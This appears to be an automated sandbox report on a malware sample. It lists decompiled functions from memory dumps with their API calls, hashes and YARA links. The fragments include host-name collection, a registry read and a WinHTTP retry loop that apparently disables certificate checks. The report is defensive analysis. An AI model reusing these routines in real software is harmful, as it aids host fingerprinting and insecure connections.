Instruction ID: d0950bd50f32da197c5de21deb90b645788c129c00f3e819b10f98d8e5164ff9
Opcode Fuzzy Hash: 8d259c18a2bb1d4d41bcc4d5d4e58fca337278aed0658e1c02adda5579feb253
Instruction Fuzzy Hash: E7314772500118EFCB21DFA4CC88DDBBB79EBC97427554698FC069B210E275DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED49A8C, Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6ED49835: GetOEMCP.KERNEL32(00000000,6ED49AA7,?,00000000,6ED416B1,6ED416B1,00000000,00000000,?), ref: 6ED49860

_free.LIBCMT ref: 6ED49B04

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1507a3885ed72b24e0190e82e817979bd7684d5d37ca43790a41fd1b6f906a17
Instruction ID: 30670eca77a5bc79cf6ab3bec7f7a974160ee2acb8256ee55b5057ded6955b49
Opcode Fuzzy Hash: 1507a3885ed72b24e0190e82e817979bd7684d5d37ca43790a41fd1b6f906a17
Instruction Fuzzy Hash: 5731D07190420AEFDB01CFE9C980BCA77F8EF51318F104469E9149B290EB32D911CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE10B9, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE10B9() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6ece41c4;
				if( *0x6ece41ac > 5) {
					_t16 = _t15 + 0x6ece50f9;
				} else {
					_t16 = _t15 + 0x6ece50b1;
				}
				E6ECE15A0(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6ECE1EF0( &_v32,  &_v16,  *0x6ece41c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6ece41b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6ECE1172(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6ece41b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6ECE2070(_t44, _t32 + 4);
						}
					}
					_t25 = E6ECE1015(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6ece10bf
0x6ece10d0
0x6ece10da
0x6ece10d2
0x6ece10d2
0x6ece10d2
0x6ece10e1
0x6ece10ea
0x6ece10ef
0x6ece110d
0x6ece1169
0x6ece110f
0x6ece1115
0x6ece111b
0x6ece1129
0x6ece112d
0x6ece1134
0x6ece113d
0x6ece1141
0x6ece1147
0x6ece1158
0x6ece1149
0x6ece114f
0x6ece114f
0x6ece1147
0x6ece1160
0x6ece1160
0x6ece116b

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6ECE1115
ExitThread.KERNEL32 ref: 6ECE116B

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 088ee9d0db451ab69c71bc6567585be9b01e50aaab0b2f354787fb8d5ca6d861
Instruction ID: 7cc20bdb7da7130e7b84bf06c3001105fab23f6edc1e400022a071764620dca3
Opcode Fuzzy Hash: 088ee9d0db451ab69c71bc6567585be9b01e50aaab0b2f354787fb8d5ca6d861
Instruction Fuzzy Hash: 54119D725087059FDB11DBA9C948F9B77FCBB06304F010916F461D35A0F730E9598B52

Uniqueness

Uniqueness Score: -1.00%

Function 00751BBF, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00751BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E007575F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00754AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x00751bc4
0x00751bcf
0x00751bd1
0x00751bd7
0x00751bd9
0x00751bde
0x00751be7
0x00751beb
0x00751bf4
0x00751bf8
0x00751c07
0x00751bfa
0x00751bfb
0x00751c00
0x00751c00
0x00751bf8
0x00751beb
0x00751c10

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,00754531,7519F710,00000000,?,?,00754531), ref: 00751BD7

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

GetComputerNameExA.KERNELBASE(00000003,00000000,00754531,00754532,?,?,00754531), ref: 00751BF4

Part of subcall function 00754AAB: RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: e6cb56df86824b60cdc0856d78315cfef7260e3194437fd6eeab55d8e3eecd86
Instruction ID: ae681872cad6c08f404583baadff178b3622c857c2b8e4bb4e92fad0ab3d31f2
Opcode Fuzzy Hash: e6cb56df86824b60cdc0856d78315cfef7260e3194437fd6eeab55d8e3eecd86
Instruction Fuzzy Hash: D0F09A2A640209AAEB11D6AA8D44FEF2BBCDBC4713F200069AD04D3140EAB4DE0A8670

Uniqueness

Uniqueness Score: -1.00%

Function 007518D8, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x75d274) == 0) {
						E00754450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x75d274) == 1) {
						_t10 = E0075262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x007518df
0x007518e0
0x007518e3
0x00751915
0x00751917
0x00751917
0x007518e5
0x007518e6
0x007518fb
0x00751902
0x00751904
0x00751904
0x00751902
0x007518e6
0x0075191f

APIs

InterlockedIncrement.KERNEL32(0075D274), ref: 007518ED

Part of subcall function 0075262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00751900,?), ref: 00752642

InterlockedDecrement.KERNEL32(0075D274), ref: 0075190D

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 84c9ede0464dd4690f6fd482c3f81c0bba4fd41a2a91eb80877acd06cd67fbcc
Instruction ID: 1d50784aa4f52959f26fe09868152a51b55b4210b54666dd173ec82cbe973c87
Opcode Fuzzy Hash: 84c9ede0464dd4690f6fd482c3f81c0bba4fd41a2a91eb80877acd06cd67fbcc
Instruction Fuzzy Hash: 9FE048353C42629F8F3127649C187DBAA50AB11747FC24914BC84D1066D7DCDD8982D1

Uniqueness

Uniqueness Score: -1.00%

Function 00751F72, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00751F72(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6fe5e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x00751f79
0x00751f86
0x00751f88
0x00751f8b
0x00751fd0
0x00751fd8
0x00751fde
0x00751fe2
0x00000000
0x00000000
0x00751f8f
0x00751f95
0x00751f9d
0x00751fce
0x00000000
0x00000000
0x00751f9f
0x00751f9f
0x00751fa9
0x00751fad
0x00751fb6
0x00751fbe
0x00751fec
0x00751fc0
0x00751fc0
0x00000000
0x00751fc0
0x00751fbe
0x00751fa9
0x00751fef
0x00751ff6
0x00751ff6
0x00000000

APIs

GetLastError.KERNEL32 ref: 00751F8F
GetLastError.KERNEL32(?,?,?,?,007546B9,00000000,?,?), ref: 00751FE6

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: a1c388ebd9d184ca2c723a2cb79a6c1f3cab7a471ae35fd7d170649cdfd0cb7b
Instruction ID: a30e2a569aa858eaece9a2237ed1a08a59f6628a1c604eb9d342e56367dfc04d
Opcode Fuzzy Hash: a1c388ebd9d184ca2c723a2cb79a6c1f3cab7a471ae35fd7d170649cdfd0cb7b
Instruction Fuzzy Hash: 71015E31905208FFDB119F96DC48FEE7BB8EB84753F50802AE905A2180D7B88A48DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED49BA5, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED49C02

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 968de323aa3eb0617488e2bd69f33e2029b9a3fe11b94c2cbec0efb36d10908f
Instruction ID: 2c682c58412c5adead377f30d86f924bb89a17538e6f3d5c2c313c97f7f49c55
Opcode Fuzzy Hash: 968de323aa3eb0617488e2bd69f33e2029b9a3fe11b94c2cbec0efb36d10908f
Instruction Fuzzy Hash: E021CFB2D04A37DFCB508FDAC641B9A77A8EB16724F25460AE560672C0D772A442CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 00751E47, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00751E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x75d2e0; // 0x25ca5a8
				_t4 = _t15 + 0x75e39c; // 0x2d28944
				_t20 = _t4;
				_t6 = _t15 + 0x75e124; // 0x650047
				_t17 = E0075144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E007525D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00751e51
0x00751e58
0x00751e59
0x00751e5a
0x00751e5b
0x00751e61
0x00751e66
0x00751e66
0x00751e70
0x00751e82
0x00751e89
0x00751eb7
0x00751e8b
0x00751e8d
0x00751e92
0x00751eb4
0x00751e94
0x00751e97
0x00751e9e
0x00751ea3
0x00751ea5
0x00751ea5
0x00751eaa
0x00751eaa
0x00751e92
0x00751ebe

APIs

Part of subcall function 0075144D: SysFreeString.OLEAUT32(?), ref: 0075152C

Part of subcall function 007525D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0075474F,004F0053,00000000,?), ref: 007525DF
Part of subcall function 007525D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0075474F,004F0053,00000000,?), ref: 00752609
Part of subcall function 007525D6: memset.NTDLL ref: 0075261D

SysFreeString.OLEAUT32(00000000), ref: 00751EAA

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: b896291619bdce73e83af06682bf6ab03708524bff8fd7d224de441a727555ac
Instruction ID: 072e6a9b42fe9729dd6c06cd0b6a7d8721cafd318ca94721625a1ae01a74b3b3
Opcode Fuzzy Hash: b896291619bdce73e83af06682bf6ab03708524bff8fd7d224de441a727555ac
Instruction Fuzzy Hash: AD018C32900119FBDB11DBA4DC05EEABBB9FB04352F404265ED01E3161E7B4AD158791

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3F4F7, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 6ED3F529

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 72ea8ca4a0f0f73dd07dfe3a85613484114efe3a2d83f38408c6f0b0db688333
Instruction ID: 5f36ff9b12d06149e321a5b1da387933ef9bc0b5fc1c09fed952951d75e090e4
Opcode Fuzzy Hash: 72ea8ca4a0f0f73dd07dfe3a85613484114efe3a2d83f38408c6f0b0db688333
Instruction Fuzzy Hash: 06E0652154563BAAEA511FEADC14BCB765CFF432B4F310762DD54D61D4EB30D90285E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(?), ref: 6ED05C69

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 95c34921fb13d060e93b1d483743e69281205767c479edd537e651ac9a84d738
Instruction ID: d6c5750fe2b3dc34fa5f338dd46a0b1e5c080baa04b3377b3318860b9a826485
Opcode Fuzzy Hash: 95c34921fb13d060e93b1d483743e69281205767c479edd537e651ac9a84d738
Instruction Fuzzy Hash: E1D0C970018F04EFEF849F44E9147263BA4F707316F110128E40D832D8D7355462CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA75, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA75() {

				E0075ABF6(0x75c2c4, 0x75d0fc); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 7eb21f01f40f9cd39f66a521bcc49aa33169fafe60c5765d147a3c717ad1050b
Instruction ID: fa0201a55bc85f00c5d5f6d3e61beaa71ed99fcc63ba9e915e24700fa7f8cf7f
Opcode Fuzzy Hash: 7eb21f01f40f9cd39f66a521bcc49aa33169fafe60c5765d147a3c717ad1050b
Instruction Fuzzy Hash: EFB092C2668102BC212461481996DF70208D0C0B23730C23ABC04C0180D8C80C4E0032

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA7F, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA7F() {

				E0075ABF6(0x75c2c4, 0x75d0f8); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ea02141c8827593748f41e5c3cefae540b0190db3e9d3297ec67650d892909b1
Instruction ID: 0920d2eed5e63b75d95b3a67eaaedd7540fddede05bb35397ba9d3923828748f
Opcode Fuzzy Hash: ea02141c8827593748f41e5c3cefae540b0190db3e9d3297ec67650d892909b1
Instruction Fuzzy Hash: 1EB092C2658202BC222461481956DF70208D0C0B13730C23ABC04C018098C80C8E0033

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA61, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA61() {

				E0075ABF6(0x75c2c4, 0x75d104); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3b979c48737077779165b42bccd63ea9224bacaa960ccfde76fdcefa3ec304e0
Instruction ID: 9e015d61caf6dc95064d0788b426b548258aeab5ec7606e7f5692449687916af
Opcode Fuzzy Hash: 3b979c48737077779165b42bccd63ea9224bacaa960ccfde76fdcefa3ec304e0
Instruction Fuzzy Hash: A1B012C2758502BD312471481E46DF7020CC0C0B13730C23AFC00C0180D8CC0C4E0033

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA6B, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA6B() {

				E0075ABF6(0x75c2c4, 0x75d100); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: b8fcc08cb4b8271918e6917405f3bbc3ff992d78278ecd188a90445fdde3b80e
Instruction ID: e5c1915e72f7089853552752613831ebfa4e2eba4e6bf56b34eee126885bfd4a
Opcode Fuzzy Hash: b8fcc08cb4b8271918e6917405f3bbc3ff992d78278ecd188a90445fdde3b80e
Instruction Fuzzy Hash: E2B012C2758502BD312471581D06DF7020CD0C0B13730C23AFC00C0180E8CC0C8D0033

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA57, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA57() {

				E0075ABF6(0x75c2c4, 0x75d108); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: abae977c906f6bf4318443accd37c8a054316d36eb683fe8639c8f46c8b69480
Instruction ID: f6e59cdfa784b31a3e78184914c12cd348080196ac42f20f4bd5365e72daf081
Opcode Fuzzy Hash: abae977c906f6bf4318443accd37c8a054316d36eb683fe8639c8f46c8b69480
Instruction Fuzzy Hash: F5B092C2658602BD216471485906DB70208C0C0B13730C23ABC00C018098C80C8D0033

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA3C, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA3C() {

				E0075ABF6(0x75c2c4, 0x75d110); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 58aefe60080b42f471d6bfd355ed09b858e5ae46ea091a657e076ff4a4c86295
Instruction ID: 6cf032acc5c3f35689c970c1d93e36c2b214191ab8aadd74858fd1d517270e1f
Opcode Fuzzy Hash: 58aefe60080b42f471d6bfd355ed09b858e5ae46ea091a657e076ff4a4c86295
Instruction Fuzzy Hash: 0FB092C2A58502BC313461941906CB70209D0C0B13320C63ABC008008098C80C8D0072

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA93, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA93() {

				E0075ABF6(0x75c2c4, 0x75d0f0); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 683fd3965f85322d78385af023e734a0e2620e215b2796ea51ca7a11196697f1
Instruction ID: df441fa529f4e30bb64a352171d85b3689b0c534786e899f8525341862d930ab
Opcode Fuzzy Hash: 683fd3965f85322d78385af023e734a0e2620e215b2796ea51ca7a11196697f1
Instruction Fuzzy Hash: E4B092C2658102BC212461481956EF70208E0C0B13730C23ABC04C0180D8C80C8E0032

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA89, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AA89() {

				E0075ABF6(0x75c2c4, 0x75d0f4); // executed
				goto __eax;
			}

0x0075aa4e
0x0075aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AA4E

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 01bfa9d91527fb61878f61a8be2df6e0f156e876f7ef4a7375af617721cf2fff
Instruction ID: 43d8ada984d92e0cd4799161ca0973426c1ea6d5d71121a15a4a91338a4e5c2a
Opcode Fuzzy Hash: 01bfa9d91527fb61878f61a8be2df6e0f156e876f7ef4a7375af617721cf2fff
Instruction Fuzzy Hash: C0B012C2658103BC316461481E56DF7020CD0C0B13730C23AFD04C01C0D8CC4C4F0033

Uniqueness

Uniqueness Score: -1.00%

Function 0075AB31, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AB31() {

				E0075ABF6(0x75c344, 0x75d134); // executed
				goto __eax;
			}

0x0075ab28
0x0075ab2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AB28

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: e162117ab1dff4bc1ea3ea083bd78466c6f8237d4ddde31a22ce3d143d5929af
Instruction ID: 9edc63d683da2aa8a6ba7532de1817a3b945fa5a1d87db8793f500f4c00b904c
Opcode Fuzzy Hash: e162117ab1dff4bc1ea3ea083bd78466c6f8237d4ddde31a22ce3d143d5929af
Instruction Fuzzy Hash: 86B092C125A14ABC212451081D1ADBA010AC580B13320823ABC01C8140E8C90C4E0173

Uniqueness

